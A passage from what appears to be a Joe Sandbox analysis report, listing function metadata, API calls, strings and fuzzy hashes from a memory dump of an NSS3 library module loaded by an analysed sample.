Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
String ID:
API String ID: 1716546843-0
Opcode ID: d6bd21543b924fe55563cd9edc60c2149d714eee8a9f9d2f05f3e23aab284ecc
Instruction ID: 2ac4472c53286b89ddbd43c7e2747f6f99f75ca8323590fdfa42dbf7e4865307
Opcode Fuzzy Hash: d6bd21543b924fe55563cd9edc60c2149d714eee8a9f9d2f05f3e23aab284ecc
Instruction Fuzzy Hash: 62313772E00216ABDB00AF2CCC45A95B7A8BF0971CF14812AEC1CE7B51E731E865C7D6

Function 6C6AAE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C6AAEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C6AAECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6AAEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C6AAF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C7C9500), ref: 6C6AAF23

Part of subcall function 6C6FF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C6FF0C8
Part of subcall function 6C6FF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6FF122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6AAF37

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: 98ed6ee7a519e15106c3ae875e3467330d2ec3cfc04dc8916587a34de04f2f26
Instruction ID: 720478cb317e4469f321d8cbf15281f744e499b97c89e4747681f3fee173074f
Opcode Fuzzy Hash: 98ed6ee7a519e15106c3ae875e3467330d2ec3cfc04dc8916587a34de04f2f26
Instruction Fuzzy Hash: C8213CB19092005BE7104E589D41B9A77E4AF8572CF144319FC649B7D2F731D90A8BAB

Function 6C72EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C72EE85
realloc.MOZGLUE(1BD51D23,?), ref: 6C72EEAE
PORT_Alloc_Util.NSS3(?), ref: 6C72EEC5

Part of subcall function 6C700BE0: malloc.MOZGLUE(6C6F8D2D,?,00000000,?), ref: 6C700BF8
Part of subcall function 6C700BE0: TlsGetValue.KERNEL32(6C6F8D2D,?,00000000,?), ref: 6C700C15

htonl.WSOCK32(?), ref: 6C72EEE3
htonl.WSOCK32(00000000,?), ref: 6C72EEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C72EF01

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: 1f68ca551eb47552a27ed256257e491f4fa5b64cba3474ff18e58455f687a879
Instruction ID: dec6e48af93e91e2b950b5c27c495f3829662ed136c5d0132ea892c6f03c05c7
Opcode Fuzzy Hash: 1f68ca551eb47552a27ed256257e491f4fa5b64cba3474ff18e58455f687a879
Instruction Fuzzy Hash: 8621D371A002189FDB109F38DD8879A77A8EF49359F148179EC199B751E334EC14CBE2

Function 6C6DEE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6DEE49

Part of subcall function 6C6FFAB0: free.MOZGLUE(?,-00000001,?,?,6C69F673,00000000,00000000), ref: 6C6FFAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C6DEE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C6DEE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C6DEE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6DEEB3

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: eb195d1115bc9d6e1237a8390223aca921737a7858cc4816fb4f63c7cafea035
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 7C21C6B6A002116BEB118B14DC81EABB7A9EB46708F050164FE18DB341E671EC15C7EA

Function 6C6F4820 Relevance: 9.1, APIs: 6, Instructions: 74stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C6F4EB8,?), ref: 6C6F4884

Part of subcall function 6C6F8800: TlsGetValue.KERNEL32(?,6C70085A,00000000,?,6C6A8369,?), ref: 6C6F8821
Part of subcall function 6C6F8800: TlsGetValue.KERNEL32(?,?,6C70085A,00000000,?,6C6A8369,?), ref: 6C6F883D
Part of subcall function 6C6F8800: EnterCriticalSection.KERNEL32(?,?,?,6C70085A,00000000,?,6C6A8369,?), ref: 6C6F8856
Part of subcall function 6C6F8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C6F8887
Part of subcall function 6C6F8800: PR_Unlock.NSS3(?,?,?,?,6C70085A,00000000,?,6C6A8369,?), ref: 6C6F8899

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6F4EB8,?,?,?,?,?,?,?,?,?,?,6C6B78F8), ref: 6C6F484C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6F4EB8,?,?,?,?,?,?,?,?,?,?,6C6B78F8), ref: 6C6F486D
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C6B78F8), ref: 6C6F4899
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6F48A9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6F48B8

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
String ID:
API String ID: 2226052791-0
Opcode ID: cf330a78fc5835229b6b1205c3bd1eef5f664c9fb1b8a0a5697fd331294809ac
Instruction ID: 0ccdb8d0bbecb2d50173f6fa8894f04e45d50915dcefaf3a92f697003957bf3d
Opcode Fuzzy Hash: cf330a78fc5835229b6b1205c3bd1eef5f664c9fb1b8a0a5697fd331294809ac
Instruction Fuzzy Hash: 80216772B0024497EF105EA4DE84967777AAF0731CB040178DA3947F01E761E816C7E5

Function 6C6B89E0 Relevance: 9.1, APIs: 6, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C6B88AE,-00000008), ref: 6C6B8A04
EnterCriticalSection.KERNEL32(?), ref: 6C6B8A15
memset.VCRUNTIME140(6C6B88AE,00000000,00000132), ref: 6C6B8A27
PR_Unlock.NSS3(?), ref: 6C6B8A35
memset.VCRUNTIME140(6C6B88AE,00000000,00000132,00000000,-00000008,00000000,?,?,6C6B88AE,-00000008), ref: 6C6B8A45
free.MOZGLUE(6C6B88A6,?,6C6B88AE,-00000008), ref: 6C6B8A4E

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: memset$CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 65992600-0
Opcode ID: e7f29a598f760bbe2aa0bacb81d721eb92cf57632e29ae21fcd0dda03edb60d2
Instruction ID: e264be89b50ff69ec910b77411933495594a70ace79aadfb00c004d0c24fda4b
Opcode Fuzzy Hash: e7f29a598f760bbe2aa0bacb81d721eb92cf57632e29ae21fcd0dda03edb60d2
Instruction Fuzzy Hash: 501108B5E003069BEB009F68DC89A9ABB78FF0A718F000576E918A7610E731D564C7E5

Function 6C7B8910 Relevance: 9.1, APIs: 6, Instructions: 55threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C7B892E

Part of subcall function 6C690F00: PR_GetPageSize.NSS3(6C690936,FFFFE8AE,?,6C6216B7,00000000,?,6C690936,00000000,?,6C62204A), ref: 6C690F1B
Part of subcall function 6C690F00: PR_NewLogModule.NSS3(clock,6C690936,FFFFE8AE,?,6C6216B7,00000000,?,6C690936,00000000,?,6C62204A), ref: 6C690F25

PR_Lock.NSS3 ref: 6C7B8950

Part of subcall function 6C769BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C691A48), ref: 6C769BB3
Part of subcall function 6C769BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C691A48), ref: 6C769BC8

getprotobynumber.WSOCK32(?), ref: 6C7B8959
GetLastError.KERNEL32(?), ref: 6C7B8967
PR_GetCurrentThread.NSS3(?,?), ref: 6C7B896F
PR_Unlock.NSS3(?,?), ref: 6C7B898A

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CurrentThread$CriticalEnterErrorLastLockModulePageSectionSizeUnlockValuegetprotobynumber
String ID:
API String ID: 4143355744-0
Opcode ID: 92a8d70e2ff9705487c21e22c51289b6aa8da17f7f7b77a5193dbb30e4b542a0
Instruction ID: 1752dbdecaf272343d235eb2f44f11a864229744b570630807c8c1e8e7955db9
Opcode Fuzzy Hash: 92a8d70e2ff9705487c21e22c51289b6aa8da17f7f7b77a5193dbb30e4b542a0
Instruction Fuzzy Hash: E711E972A141219BCF105F79DE4854A3B68EF46378F0943B6EC19A7B61D7308C04C7C6

Function 6C736840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

PR_NewMonitor.NSS3(00000000,?,6C73AA9B,?,?,?,?,?,?,?,00000000,?,6C7380C1), ref: 6C736846

Part of subcall function 6C691770: calloc.MOZGLUE(00000001,0000019C,?,6C6915C2,?,?,?,?,?,00000001,00000040), ref: 6C69178D

PR_NewMonitor.NSS3(00000000,?,6C73AA9B,?,?,?,?,?,?,?,00000000,?,6C7380C1), ref: 6C736855

Part of subcall function 6C6F8680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C6A55D0,00000000,00000000), ref: 6C6F868B
Part of subcall function 6C6F8680: PR_NewLock.NSS3(00000000,00000000), ref: 6C6F86A0
Part of subcall function 6C6F8680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C6F86B2
Part of subcall function 6C6F8680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C6F86C8
Part of subcall function 6C6F8680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C6F86E2
Part of subcall function 6C6F8680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C6F86EC
Part of subcall function 6C6F8680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C6F8700

PR_NewMonitor.NSS3(?,6C73AA9B,?,?,?,?,?,?,?,00000000,?,6C7380C1), ref: 6C73687D

Part of subcall function 6C691770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C6918DE
Part of subcall function 6C691770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C6918F1

PR_NewMonitor.NSS3(?,6C73AA9B,?,?,?,?,?,?,?,00000000,?,6C7380C1), ref: 6C73688C

Part of subcall function 6C691770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C6918FC
Part of subcall function 6C691770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C69198A

PR_NewLock.NSS3 ref: 6C7368A5

Part of subcall function 6C7698D0: calloc.MOZGLUE(00000001,00000084,6C690936,00000001,?,6C69102C), ref: 6C7698E5

PR_NewLock.NSS3 ref: 6C7368B4

Part of subcall function 6C7698D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C769946
Part of subcall function 6C7698D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6216B7,00000000), ref: 6C76994E
Part of subcall function 6C7698D0: free.MOZGLUE(00000000), ref: 6C76995E

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
String ID:
API String ID: 200661885-0
Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction ID: 7f3f66780be2f6f2c065ad6b18097d6405b48201c179d6e1f4983a7e04042150
Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction Fuzzy Hash: 510112B0605F1746EB516B7749183E7B6E9AF06388F10143E88ADC9B41EF71D508CBA5

Function 6C68AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C68AFDA

Strings

misuse, xrefs: 6C68AFCE
unable to delete/modify collation sequence due to active statements, xrefs: 6C68AF5C
%s at line %d of [%.10s], xrefs: 6C68AFD3
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C68AFC4

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 5d3bc421c76ccfc52973e5ef742949e7bdf78ab62e8e00c7de7d121f2e22f960
Instruction ID: 43642c7975602272e4ad33927dddc617481b806354cbf320429ea9b7793bf4ae
Opcode Fuzzy Hash: 5d3bc421c76ccfc52973e5ef742949e7bdf78ab62e8e00c7de7d121f2e22f960
Instruction Fuzzy Hash: D591E475B022158FDB04CF29C854BAAB7F1BF89314F1945A8E864AB792C334ED02CB74

Function 6C6B49C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 6C6B4860: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B4894

PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C6B6361,?,?,?), ref: 6C6B4A8F
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C6B6361,?,?,?), ref: 6C6B4AD0

Strings

ackl, xrefs: 6C6B49FB
ackl, xrefs: 6C6B4AB4
^jkl, xrefs: 6C6B49C5

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Error$DecodeItem_QuickUtil
String ID: ^jkl$ackl$ackl
API String ID: 1982233058-2424513204
Opcode ID: 9ea4b6e68758e32f0eea69f72cb8583513c08210d32cacada843959b4c93e839
Instruction ID: 6df79e00da737e9af29c3ece3be9ed96444aa382f6c3601dd79803e146a2a07e
Opcode Fuzzy Hash: 9ea4b6e68758e32f0eea69f72cb8583513c08210d32cacada843959b4c93e839
Instruction Fuzzy Hash: 5B310B30A0410597FF108A48EC94BBFB375DB82318F204A3AD515F7BC9C7B49864879E

Function 6C716DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C716E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C716E57

Part of subcall function 6C74C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C74C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C716E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C716EAA

Strings

n{l, xrefs: 6C716DF9

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID: n{l
API String ID: 3163584228-702554438
Opcode ID: 2c023deaa5d4f34beb49e6769195f84bbeb611a2769c01f5ea86f52903270634
Instruction ID: f3d6d9db61eac74b059200222825bc471d2774fae809f39484f4f6bb9552d0ed
Opcode Fuzzy Hash: 2c023deaa5d4f34beb49e6769195f84bbeb611a2769c01f5ea86f52903270634
Instruction Fuzzy Hash: C631C571618612EEDB141F34DE08396BBA8FB0131AF18073CD89AD6E41E731A65CCF81

Function 6C74A8F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C732AE9,00000000,0000065C), ref: 6C74A91D

Part of subcall function 6C6EADC0: TlsGetValue.KERNEL32(?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE10
Part of subcall function 6C6EADC0: EnterCriticalSection.KERNEL32(?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE24
Part of subcall function 6C6EADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C6CD079,00000000,00000001), ref: 6C6EAE5A
Part of subcall function 6C6EADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE6F
Part of subcall function 6C6EADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE7F
Part of subcall function 6C6EADC0: TlsGetValue.KERNEL32(?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAEB1
Part of subcall function 6C6EADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAEC9

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C732AE9,00000000,0000065C), ref: 6C74A934
SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000000,?,?,6C732AE9,00000000,0000065C), ref: 6C74A949
free.MOZGLUE(?,00000000,0000065C), ref: 6C74A952

Strings

*sl, xrefs: 6C74A8F6

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: *sl
API String ID: 1595327144-1586742534
Opcode ID: 1437f751c18074ef16ab302e804fc159a2a5666394627358640687662d2b4f5f
Instruction ID: 50f5be5d55c9d464028ffbc398d94d0e37f3c8bf951c3fe1b13eaa12e3e6699b
Opcode Fuzzy Hash: 1437f751c18074ef16ab302e804fc159a2a5666394627358640687662d2b4f5f
Instruction Fuzzy Hash: B7312AB5601201DFD704CF14DA84E62BBE8FF49328B1681B9E8198F756E730E811CFA1

Function 6C77A800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C647915,?,?), ref: 6C77A86D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C647915,?,?), ref: 6C77A8A6

Strings

database corruption, xrefs: 6C77A89B
%s at line %d of [%.10s], xrefs: 6C77A8A0
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C77A891

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
